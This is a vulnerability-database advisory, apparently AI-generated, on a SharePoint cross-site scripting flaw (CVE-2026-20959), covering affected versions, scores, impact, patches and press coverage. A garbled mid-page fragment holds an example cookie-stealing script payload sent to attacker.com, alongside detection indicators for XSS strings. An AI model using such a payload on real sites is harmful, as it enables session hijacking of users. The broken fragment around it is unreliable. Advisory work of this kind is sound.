
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-20959 is a Cross-Site Scripting (XSS) vulnerability in Microsoft Office SharePoint that allows an authorized, low-privileged attacker to perform spoofing over a network via improper neutralization of input during web page generation. It was disclosed on January 13, 2026, as part of Microsoft's January 2026 Patch Tuesday security update cycle. Affected products include SharePoint Server 2016 (Enterprise), SharePoint Server 2019, and SharePoint Server Subscription Edition (versions before 16.0.19127.20442). The CVSS v3.1 base score is 5.4 (Medium) per NVD, and 4.6 (Medium) per Microsoft (Microsoft MSRC, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), where SharePoint fails to adequately sanitize user-supplied input before rendering it in web pages (Microsoft MSRC). The attack vector is network-based, requiring low privileges and user interaction (e.g., a victim clicking a malicious link or visiting a crafted SharePoint page). An authenticated attacker can inject malicious scripts into SharePoint pages, which execute in the context of another user's browser session, enabling spoofing attacks. The scope is changed in the NVD assessment (S:C), indicating the injected script can affect resources beyond the vulnerable component's security scope.
Successful exploitation allows an attacker to inject malicious scripts into SharePoint pages viewed by other users, potentially enabling credential theft, session hijacking, or tricking victims into performing unintended actions through spoofed content. Both confidentiality and integrity are impacted at a low level, while availability is not affected. The attack requires user interaction, limiting its reach, but in enterprise environments where SharePoint is widely used for collaboration, the risk of credential harvesting or phishing via spoofed content is meaningful (Microsoft MSRC, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to steal session cookies or perform spoofing actions.<script>, javascript:, or encoded XSS payloads in POST/GET parameters; repeated access to specific SharePoint pages by multiple users followed by anomalous external connections.Microsoft released patches on January 13, 2026, as part of the January 2026 Patch Tuesday update. Organizations should update to the following fixed versions: SharePoint Server 2016 Enterprise to version 16.0.5535.1001 or later, SharePoint Server 2019 to version 16.0.10417.20083 or later, and SharePoint Server Subscription Edition to version 16.0.19127.20442 or later (Microsoft MSRC, Feedly). No specific configuration-based workaround has been published; patching is the recommended remediation. As a general defense-in-depth measure, organizations should enforce least-privilege access to SharePoint and enable Content Security Policy (CSP) headers where supported.
CVE-2026-20959 was covered as part of broader January 2026 Patch Tuesday roundups by security outlets including BleepingComputer, Cybersecurity News, GBHackers, and the Zero Day Initiative blog, though it received limited individual attention given its moderate severity score (BleepingComputer, ZDI Blog). The SANS Internet Storm Center also noted the January 2026 update batch (SANS ISC). No notable individual researcher commentary or significant social media discussion specific to this CVE has been identified, consistent with its moderate severity and lack of active exploitation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."